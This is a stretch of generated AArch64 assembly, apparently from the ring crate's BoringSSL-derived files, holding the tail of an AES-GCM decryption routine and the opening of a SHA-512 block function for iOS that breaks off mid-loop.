aesmc v2.16b, v2.16b // AES block 4k+6 - round 11
aese v0.16b, v29.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 11
aese v1.16b, v29.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 11
aese v2.16b, v30.16b
aesmc v2.16b, v2.16b // AES block 4k+6 - round 12
aese v3.16b, v29.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 11
aese v1.16b, v30.16b
aesmc v1.16b, v1.16b // AES block 4k+5 - round 12
aese v0.16b, v30.16b
aesmc v0.16b, v0.16b // AES block 4k+4 - round 12
aese v3.16b, v30.16b
aesmc v3.16b, v3.16b // AES block 4k+7 - round 12
Ldec_finish_prepretail:
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor x22, x22, x14 // AES block 4k+2 - round N high
eor x23, x23, x13 // AES block 4k+3 - round N low
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
add w12, w12, #1 // CTR block 4k+7
eor x21, x21, x13 // AES block 4k+2 - round N low
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
eor x24, x24, x14 // AES block 4k+3 - round N high
stp x21, x22, [x2], #16 // AES block 4k+2 - store result
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
stp x23, x24, [x2], #16 // AES block 4k+3 - store result
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
aese v1.16b, v31.16b // AES block 4k+5 - round N-1
aese v0.16b, v31.16b // AES block 4k+4 - round N-1
aese v3.16b, v31.16b // AES block 4k+7 - round N-1
aese v2.16b, v31.16b // AES block 4k+6 - round N-1
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
Ldec_tail: // TAIL
sub x5, x4, x0 // x5 = bytes left to process (register previously used as main_end_input_ptr)
ld1 { v5.16b}, [x0], #16 // AES block 4k+4 - load ciphertext
eor v0.16b, v5.16b, v0.16b // AES block 4k+4 - result
mov x6, v0.d[0] // AES block 4k+4 - mov low
mov x7, v0.d[1] // AES block 4k+4 - mov high
ext v8.16b, v11.16b, v11.16b, #8 // prepare final partial tag
cmp x5, #48
eor x6, x6, x13 // AES block 4k+4 - round N low
eor x7, x7, x14 // AES block 4k+4 - round N high
b.gt Ldec_blocks_more_than_3
sub w12, w12, #1
mov v3.16b, v2.16b
movi v10.8b, #0
movi v11.8b, #0
cmp x5, #32
movi v9.8b, #0
mov v2.16b, v1.16b
b.gt Ldec_blocks_more_than_2
sub w12, w12, #1
mov v3.16b, v1.16b
cmp x5, #16
b.gt Ldec_blocks_more_than_1
sub w12, w12, #1
b Ldec_blocks_less_than_1
Ldec_blocks_more_than_3: // blocks left > 3
rev64 v4.16b, v5.16b // GHASH final-3 block
ld1 { v5.16b}, [x0], #16 // AES final-2 block - load ciphertext
stp x6, x7, [x2], #16 // AES final-3 block - store result
mov d10, v17.d[1] // GHASH final-3 block - mid
eor v4.16b, v4.16b, v8.16b // feed in partial tag
eor v0.16b, v5.16b, v1.16b // AES final-2 block - result
mov d22, v4.d[1] // GHASH final-3 block - mid
mov x6, v0.d[0] // AES final-2 block - mov low
mov x7, v0.d[1] // AES final-2 block - mov high
eor v22.8b, v22.8b, v4.8b // GHASH final-3 block - mid
movi v8.8b, #0 // suppress further partial tag feed in
pmull2 v9.1q, v4.2d, v15.2d // GHASH final-3 block - high
pmull v10.1q, v22.1d, v10.1d // GHASH final-3 block - mid
eor x6, x6, x13 // AES final-2 block - round N low
pmull v11.1q, v4.1d, v15.1d // GHASH final-3 block - low
eor x7, x7, x14 // AES final-2 block - round N high
Ldec_blocks_more_than_2: // blocks left > 2
rev64 v4.16b, v5.16b // GHASH final-2 block
ld1 { v5.16b}, [x0], #16 // AES final-1 block - load ciphertext
eor v4.16b, v4.16b, v8.16b // feed in partial tag
stp x6, x7, [x2], #16 // AES final-2 block - store result
eor v0.16b, v5.16b, v2.16b // AES final-1 block - result
mov d22, v4.d[1] // GHASH final-2 block - mid
pmull v21.1q, v4.1d, v14.1d // GHASH final-2 block - low
pmull2 v20.1q, v4.2d, v14.2d // GHASH final-2 block - high
eor v22.8b, v22.8b, v4.8b // GHASH final-2 block - mid
mov x6, v0.d[0] // AES final-1 block - mov low
mov x7, v0.d[1] // AES final-1 block - mov high
eor v11.16b, v11.16b, v21.16b // GHASH final-2 block - low
movi v8.8b, #0 // suppress further partial tag feed in
pmull v22.1q, v22.1d, v17.1d // GHASH final-2 block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final-2 block - high
eor x6, x6, x13 // AES final-1 block - round N low
eor v10.16b, v10.16b, v22.16b // GHASH final-2 block - mid
eor x7, x7, x14 // AES final-1 block - round N high
Ldec_blocks_more_than_1: // blocks left > 1
stp x6, x7, [x2], #16 // AES final-1 block - store result
rev64 v4.16b, v5.16b // GHASH final-1 block
ld1 { v5.16b}, [x0], #16 // AES final block - load ciphertext
eor v4.16b, v4.16b, v8.16b // feed in partial tag
movi v8.8b, #0 // suppress further partial tag feed in
mov d22, v4.d[1] // GHASH final-1 block - mid
eor v0.16b, v5.16b, v3.16b // AES final block - result
pmull2 v20.1q, v4.2d, v13.2d // GHASH final-1 block - high
eor v22.8b, v22.8b, v4.8b // GHASH final-1 block - mid
pmull v21.1q, v4.1d, v13.1d // GHASH final-1 block - low
mov x6, v0.d[0] // AES final block - mov low
ins v22.d[1], v22.d[0] // GHASH final-1 block - mid
mov x7, v0.d[1] // AES final block - mov high
pmull2 v22.1q, v22.2d, v16.2d // GHASH final-1 block - mid
eor x6, x6, x13 // AES final block - round N low
eor v11.16b, v11.16b, v21.16b // GHASH final-1 block - low
eor v9.16b, v9.16b, v20.16b // GHASH final-1 block - high
eor v10.16b, v10.16b, v22.16b // GHASH final-1 block - mid
eor x7, x7, x14 // AES final block - round N high
Ldec_blocks_less_than_1: // blocks left <= 1
and x1, x1, #127 // bit_length %= 128
mvn x14, xzr // rkN_h = 0xffffffffffffffff
sub x1, x1, #128 // bit_length -= 128
mvn x13, xzr // rkN_l = 0xffffffffffffffff
ldp x4, x5, [x2] // load existing bytes we need to not overwrite
neg x1, x1 // bit_length = 128 - #bits in input (in range [1,128])
and x1, x1, #127 // bit_length %= 128
lsr x14, x14, x1 // rkN_h is mask for top 64b of last block
cmp x1, #64
csel x9, x13, x14, lt
csel x10, x14, xzr, lt
fmov d0, x9 // ctr0b is mask for last block
and x6, x6, x9
mov v0.d[1], x10
bic x4, x4, x9 // mask out low existing bytes
rev w9, w12
bic x5, x5, x10 // mask out high existing bytes
orr x6, x6, x4
and x7, x7, x10
orr x7, x7, x5
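// NOTE (editorial annotation): for the partial final block the
// decrypted pair x6:x7 is masked to the valid byte count while the
// existing destination bytes (x4:x5, cleared with bic) are OR'd back
// in, so the 16-byte stp at the end never clobbers data past the
// message end.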
and v5.16b, v5.16b, v0.16b // possibly partial last block has zeroes in highest bits
rev64 v4.16b, v5.16b // GHASH final block
eor v4.16b, v4.16b, v8.16b // feed in partial tag
pmull v21.1q, v4.1d, v12.1d // GHASH final block - low
mov d8, v4.d[1] // GHASH final block - mid
eor v8.8b, v8.8b, v4.8b // GHASH final block - mid
pmull2 v20.1q, v4.2d, v12.2d // GHASH final block - high
pmull v8.1q, v8.1d, v16.1d // GHASH final block - mid
eor v9.16b, v9.16b, v20.16b // GHASH final block - high
eor v11.16b, v11.16b, v21.16b // GHASH final block - low
eor v10.16b, v10.16b, v8.16b // GHASH final block - mid
movi v8.8b, #0xc2
eor v6.16b, v11.16b, v9.16b // MODULO - karatsuba tidy up
shl d8, d8, #56 // mod_constant
eor v10.16b, v10.16b, v6.16b // MODULO - karatsuba tidy up
pmull v7.1q, v9.1d, v8.1d // MODULO - top 64b align with mid
ext v9.16b, v9.16b, v9.16b, #8 // MODULO - other top alignment
eor v10.16b, v10.16b, v7.16b // MODULO - fold into mid
eor v10.16b, v10.16b, v9.16b // MODULO - fold into mid
pmull v8.1q, v10.1d, v8.1d // MODULO - mid 64b align with low
ext v10.16b, v10.16b, v10.16b, #8 // MODULO - other mid alignment
eor v11.16b, v11.16b, v8.16b // MODULO - fold into low
stp x6, x7, [x2]
str w9, [x16, #12] // store the updated counter
eor v11.16b, v11.16b, v10.16b // MODULO - fold into low
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
mov x0, x15
st1 { v11.16b }, [x3]
ldp x19, x20, [sp, #16]
ldp x21, x22, [sp, #32]
ldp x23, x24, [sp, #48]
ldp d8, d9, [sp, #64]
ldp d10, d11, [sp, #80]
ldp d12, d13, [sp, #96]
ldp d14, d15, [sp, #112]
ldp x29, x30, [sp], #128
AARCH64_VALIDATE_LINK_REGISTER
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 49,024 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/sha512-armv8-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
// Copyright 2014-2020 The OpenSSL Project Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// https://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// ====================================================================
// Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
// project.
// ====================================================================
//
// SHA256/512 for ARMv8.
//
// Performance in cycles per processed byte and improvement coefficient
// over code generated with "default" compiler:
//
// SHA256-hw SHA256(*) SHA512
// Apple A7 1.97 10.5 (+33%) 6.73 (-1%(**))
// Cortex-A53 2.38 15.5 (+115%) 10.0 (+150%(***))
// Cortex-A57 2.31 11.6 (+86%) 7.51 (+260%(***))
// Denver 2.01 10.5 (+26%) 6.70 (+8%)
// X-Gene 20.0 (+100%) 12.8 (+300%(***))
// Mongoose 2.36 13.0 (+50%) 8.36 (+33%)
// Kryo 1.92 17.4 (+30%) 11.2 (+8%)
//
// (*) Software SHA256 results are of lesser relevance, presented
// mostly for informational purposes.
// (**) The result is a trade-off: it's possible to improve it by
// 10% (or by 1 cycle per round), but at the cost of 20% loss
// on Cortex-A53 (or by 4 cycles per round).
// (***) Super-impressive coefficients over gcc-generated code are
// indication of some compiler "pathology", most notably code
// generated with -mgeneral-regs-only is significantly faster
// and the gap is only 40-90%.
#ifndef __KERNEL__
#endif
.text
.globl _sha512_block_data_order_nohw
.private_extern _sha512_block_data_order_nohw
.align 6
_sha512_block_data_order_nohw:
AARCH64_SIGN_LINK_REGISTER
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
sub sp,sp,#4*8
ldp x20,x21,[x0] // load context
ldp x22,x23,[x0,#2*8]
ldp x24,x25,[x0,#4*8]
add x2,x1,x2,lsl#7 // end of input
ldp x26,x27,[x0,#6*8]
adrp x30,LK512@PAGE
add x30,x30,LK512@PAGEOFF
stp x0,x2,[x29,#96]
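// Each pass of Loop consumes one 1024-bit input block: x20-x27 hold
// the working variables a..h, the 16-word message schedule circulates
// through the remaining general registers with four spill slots at
// [sp], and x19/x28 alternate as the Maj() accumulator noted in the
// per-round comments.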
Loop:
ldp x3,x4,[x1],#2*8
ldr x19,[x30],#8 // *K++
eor x28,x21,x22 // magic seed
str x1,[x29,#112]
#ifndef __AARCH64EB__
rev x3,x3 // 0
#endif
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
eor x6,x24,x24,ror#23
and x17,x25,x24
bic x19,x26,x24
add x27,x27,x3 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x6,ror#18 // Sigma1(e)
ror x6,x20,#28
add x27,x27,x17 // h+=Ch(e,f,g)
eor x17,x20,x20,ror#5
add x27,x27,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x23,x23,x27 // d+=h
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x6,x17,ror#34 // Sigma0(a)
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x27,x27,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x4,x4 // 1
#endif
ldp x5,x6,[x1],#2*8
add x27,x27,x17 // h+=Sigma0(a)
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
eor x7,x23,x23,ror#23
and x17,x24,x23
bic x28,x25,x23
add x26,x26,x4 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x7,ror#18 // Sigma1(e)
ror x7,x27,#28
add x26,x26,x17 // h+=Ch(e,f,g)
eor x17,x27,x27,ror#5
add x26,x26,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x22,x22,x26 // d+=h
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x7,x17,ror#34 // Sigma0(a)
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x26,x26,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x5,x5 // 2
#endif
add x26,x26,x17 // h+=Sigma0(a)
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
eor x8,x22,x22,ror#23
and x17,x23,x22
bic x19,x24,x22
add x25,x25,x5 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x8,ror#18 // Sigma1(e)
ror x8,x26,#28
add x25,x25,x17 // h+=Ch(e,f,g)
eor x17,x26,x26,ror#5
add x25,x25,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x21,x21,x25 // d+=h
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x8,x17,ror#34 // Sigma0(a)
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x25,x25,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x6,x6 // 3
#endif
ldp x7,x8,[x1],#2*8
add x25,x25,x17 // h+=Sigma0(a)
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
eor x9,x21,x21,ror#23
and x17,x22,x21
bic x28,x23,x21
add x24,x24,x6 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x9,ror#18 // Sigma1(e)
ror x9,x25,#28
add x24,x24,x17 // h+=Ch(e,f,g)
eor x17,x25,x25,ror#5
add x24,x24,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x20,x20,x24 // d+=h
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x9,x17,ror#34 // Sigma0(a)
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x24,x24,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x7,x7 // 4
#endif
add x24,x24,x17 // h+=Sigma0(a)
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
eor x10,x20,x20,ror#23
and x17,x21,x20
bic x19,x22,x20
add x23,x23,x7 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x10,ror#18 // Sigma1(e)
ror x10,x24,#28
add x23,x23,x17 // h+=Ch(e,f,g)
eor x17,x24,x24,ror#5
add x23,x23,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x27,x27,x23 // d+=h
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x10,x17,ror#34 // Sigma0(a)
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x23,x23,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x8,x8 // 5
#endif
ldp x9,x10,[x1],#2*8
add x23,x23,x17 // h+=Sigma0(a)
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
eor x11,x27,x27,ror#23
and x17,x20,x27
bic x28,x21,x27
add x22,x22,x8 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x11,ror#18 // Sigma1(e)
ror x11,x23,#28
add x22,x22,x17 // h+=Ch(e,f,g)
eor x17,x23,x23,ror#5
add x22,x22,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x26,x26,x22 // d+=h
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x11,x17,ror#34 // Sigma0(a)
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x22,x22,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x9,x9 // 6
#endif
add x22,x22,x17 // h+=Sigma0(a)
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
eor x12,x26,x26,ror#23
and x17,x27,x26
bic x19,x20,x26
add x21,x21,x9 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x12,ror#18 // Sigma1(e)
ror x12,x22,#28
add x21,x21,x17 // h+=Ch(e,f,g)
eor x17,x22,x22,ror#5
add x21,x21,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x25,x25,x21 // d+=h
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x12,x17,ror#34 // Sigma0(a)
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x21,x21,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x10,x10 // 7
#endif
ldp x11,x12,[x1],#2*8
add x21,x21,x17 // h+=Sigma0(a)
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
eor x13,x25,x25,ror#23
and x17,x26,x25
bic x28,x27,x25
add x20,x20,x10 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x13,ror#18 // Sigma1(e)
ror x13,x21,#28
add x20,x20,x17 // h+=Ch(e,f,g)
eor x17,x21,x21,ror#5
add x20,x20,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x24,x24,x20 // d+=h
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x13,x17,ror#34 // Sigma0(a)
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x20,x20,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x11,x11 // 8
#endif
add x20,x20,x17 // h+=Sigma0(a)
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
eor x14,x24,x24,ror#23
and x17,x25,x24
bic x19,x26,x24
add x27,x27,x11 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x14,ror#18 // Sigma1(e)
ror x14,x20,#28
add x27,x27,x17 // h+=Ch(e,f,g)
eor x17,x20,x20,ror#5
add x27,x27,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x23,x23,x27 // d+=h
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x14,x17,ror#34 // Sigma0(a)
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x27,x27,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x12,x12 // 9
#endif
ldp x13,x14,[x1],#2*8
add x27,x27,x17 // h+=Sigma0(a)
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
eor x15,x23,x23,ror#23
and x17,x24,x23
bic x28,x25,x23
add x26,x26,x12 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x15,ror#18 // Sigma1(e)
ror x15,x27,#28
add x26,x26,x17 // h+=Ch(e,f,g)
eor x17,x27,x27,ror#5
add x26,x26,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x22,x22,x26 // d+=h
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x15,x17,ror#34 // Sigma0(a)
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x26,x26,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x13,x13 // 10
#endif
add x26,x26,x17 // h+=Sigma0(a)
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
eor x0,x22,x22,ror#23
and x17,x23,x22
bic x19,x24,x22
add x25,x25,x13 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x0,ror#18 // Sigma1(e)
ror x0,x26,#28
add x25,x25,x17 // h+=Ch(e,f,g)
eor x17,x26,x26,ror#5
add x25,x25,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x21,x21,x25 // d+=h
eor x28,x28,x27 // Maj(a,b,c)
eor x17,x0,x17,ror#34 // Sigma0(a)
add x25,x25,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x25,x25,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x14,x14 // 11
#endif
ldp x15,x0,[x1],#2*8
add x25,x25,x17 // h+=Sigma0(a)
str x6,[sp,#24]
ror x16,x21,#14
add x24,x24,x28 // h+=K[i]
eor x6,x21,x21,ror#23
and x17,x22,x21
bic x28,x23,x21
add x24,x24,x14 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x25,x26 // a^b, b^c in next round
eor x16,x16,x6,ror#18 // Sigma1(e)
ror x6,x25,#28
add x24,x24,x17 // h+=Ch(e,f,g)
eor x17,x25,x25,ror#5
add x24,x24,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x20,x20,x24 // d+=h
eor x19,x19,x26 // Maj(a,b,c)
eor x17,x6,x17,ror#34 // Sigma0(a)
add x24,x24,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x24,x24,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x15,x15 // 12
#endif
add x24,x24,x17 // h+=Sigma0(a)
str x7,[sp,#0]
ror x16,x20,#14
add x23,x23,x19 // h+=K[i]
eor x7,x20,x20,ror#23
and x17,x21,x20
bic x19,x22,x20
add x23,x23,x15 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x24,x25 // a^b, b^c in next round
eor x16,x16,x7,ror#18 // Sigma1(e)
ror x7,x24,#28
add x23,x23,x17 // h+=Ch(e,f,g)
eor x17,x24,x24,ror#5
add x23,x23,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x27,x27,x23 // d+=h
eor x28,x28,x25 // Maj(a,b,c)
eor x17,x7,x17,ror#34 // Sigma0(a)
add x23,x23,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x23,x23,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x0,x0 // 13
#endif
ldp x1,x2,[x1]
add x23,x23,x17 // h+=Sigma0(a)
str x8,[sp,#8]
ror x16,x27,#14
add x22,x22,x28 // h+=K[i]
eor x8,x27,x27,ror#23
and x17,x20,x27
bic x28,x21,x27
add x22,x22,x0 // h+=X[i]
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x23,x24 // a^b, b^c in next round
eor x16,x16,x8,ror#18 // Sigma1(e)
ror x8,x23,#28
add x22,x22,x17 // h+=Ch(e,f,g)
eor x17,x23,x23,ror#5
add x22,x22,x16 // h+=Sigma1(e)
and x19,x19,x28 // (b^c)&=(a^b)
add x26,x26,x22 // d+=h
eor x19,x19,x24 // Maj(a,b,c)
eor x17,x8,x17,ror#34 // Sigma0(a)
add x22,x22,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
//add x22,x22,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x1,x1 // 14
#endif
ldr x6,[sp,#24]
add x22,x22,x17 // h+=Sigma0(a)
str x9,[sp,#16]
ror x16,x26,#14
add x21,x21,x19 // h+=K[i]
eor x9,x26,x26,ror#23
and x17,x27,x26
bic x19,x20,x26
add x21,x21,x1 // h+=X[i]
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x22,x23 // a^b, b^c in next round
eor x16,x16,x9,ror#18 // Sigma1(e)
ror x9,x22,#28
add x21,x21,x17 // h+=Ch(e,f,g)
eor x17,x22,x22,ror#5
add x21,x21,x16 // h+=Sigma1(e)
and x28,x28,x19 // (b^c)&=(a^b)
add x25,x25,x21 // d+=h
eor x28,x28,x23 // Maj(a,b,c)
eor x17,x9,x17,ror#34 // Sigma0(a)
add x21,x21,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
//add x21,x21,x17 // h+=Sigma0(a)
#ifndef __AARCH64EB__
rev x2,x2 // 15
#endif
ldr x7,[sp,#0]
add x21,x21,x17 // h+=Sigma0(a)
str x10,[sp,#24]
ror x16,x25,#14
add x20,x20,x28 // h+=K[i]
ror x9,x4,#1
and x17,x26,x25
ror x8,x1,#19
bic x28,x27,x25
ror x10,x21,#28
add x20,x20,x2 // h+=X[i]
eor x16,x16,x25,ror#18
eor x9,x9,x4,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x21,x22 // a^b, b^c in next round
eor x16,x16,x25,ror#41 // Sigma1(e)
eor x10,x10,x21,ror#34
add x20,x20,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x8,x8,x1,ror#61
eor x9,x9,x4,lsr#7 // sigma0(X[i+1])
add x20,x20,x16 // h+=Sigma1(e)
eor x19,x19,x22 // Maj(a,b,c)
eor x17,x10,x21,ror#39 // Sigma0(a)
eor x8,x8,x1,lsr#6 // sigma1(X[i+14])
add x3,x3,x12
add x24,x24,x20 // d+=h
add x20,x20,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x3,x3,x9
add x20,x20,x17 // h+=Sigma0(a)
add x3,x3,x8
Loop_16_xx:
ldr x8,[sp,#8]
str x11,[sp,#0]
ror x16,x24,#14
add x27,x27,x19 // h+=K[i]
ror x10,x5,#1
and x17,x25,x24
ror x9,x2,#19
bic x19,x26,x24
ror x11,x20,#28
add x27,x27,x3 // h+=X[i]
eor x16,x16,x24,ror#18
eor x10,x10,x5,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x20,x21 // a^b, b^c in next round
eor x16,x16,x24,ror#41 // Sigma1(e)
eor x11,x11,x20,ror#34
add x27,x27,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x9,x9,x2,ror#61
eor x10,x10,x5,lsr#7 // sigma0(X[i+1])
add x27,x27,x16 // h+=Sigma1(e)
eor x28,x28,x21 // Maj(a,b,c)
eor x17,x11,x20,ror#39 // Sigma0(a)
eor x9,x9,x2,lsr#6 // sigma1(X[i+14])
add x4,x4,x13
add x23,x23,x27 // d+=h
add x27,x27,x28 // h+=Maj(a,b,c)
ldr x28,[x30],#8 // *K++, x19 in next round
add x4,x4,x10
add x27,x27,x17 // h+=Sigma0(a)
add x4,x4,x9
ldr x9,[sp,#16]
str x12,[sp,#8]
ror x16,x23,#14
add x26,x26,x28 // h+=K[i]
ror x11,x6,#1
and x17,x24,x23
ror x10,x3,#19
bic x28,x25,x23
ror x12,x27,#28
add x26,x26,x4 // h+=X[i]
eor x16,x16,x23,ror#18
eor x11,x11,x6,ror#8
orr x17,x17,x28 // Ch(e,f,g)
eor x28,x27,x20 // a^b, b^c in next round
eor x16,x16,x23,ror#41 // Sigma1(e)
eor x12,x12,x27,ror#34
add x26,x26,x17 // h+=Ch(e,f,g)
and x19,x19,x28 // (b^c)&=(a^b)
eor x10,x10,x3,ror#61
eor x11,x11,x6,lsr#7 // sigma0(X[i+1])
add x26,x26,x16 // h+=Sigma1(e)
eor x19,x19,x20 // Maj(a,b,c)
eor x17,x12,x27,ror#39 // Sigma0(a)
eor x10,x10,x3,lsr#6 // sigma1(X[i+14])
add x5,x5,x14
add x22,x22,x26 // d+=h
add x26,x26,x19 // h+=Maj(a,b,c)
ldr x19,[x30],#8 // *K++, x28 in next round
add x5,x5,x11
add x26,x26,x17 // h+=Sigma0(a)
add x5,x5,x10
ldr x10,[sp,#24]
str x13,[sp,#16]
ror x16,x22,#14
add x25,x25,x19 // h+=K[i]
ror x12,x7,#1
and x17,x23,x22
ror x11,x4,#19
bic x19,x24,x22
ror x13,x26,#28
add x25,x25,x5 // h+=X[i]
eor x16,x16,x22,ror#18
eor x12,x12,x7,ror#8
orr x17,x17,x19 // Ch(e,f,g)
eor x19,x26,x27 // a^b, b^c in next round
eor x16,x16,x22,ror#41 // Sigma1(e)
eor x13,x13,x26,ror#34
add x25,x25,x17 // h+=Ch(e,f,g)
and x28,x28,x19 // (b^c)&=(a^b)
eor x11,x11,x4,ror#61
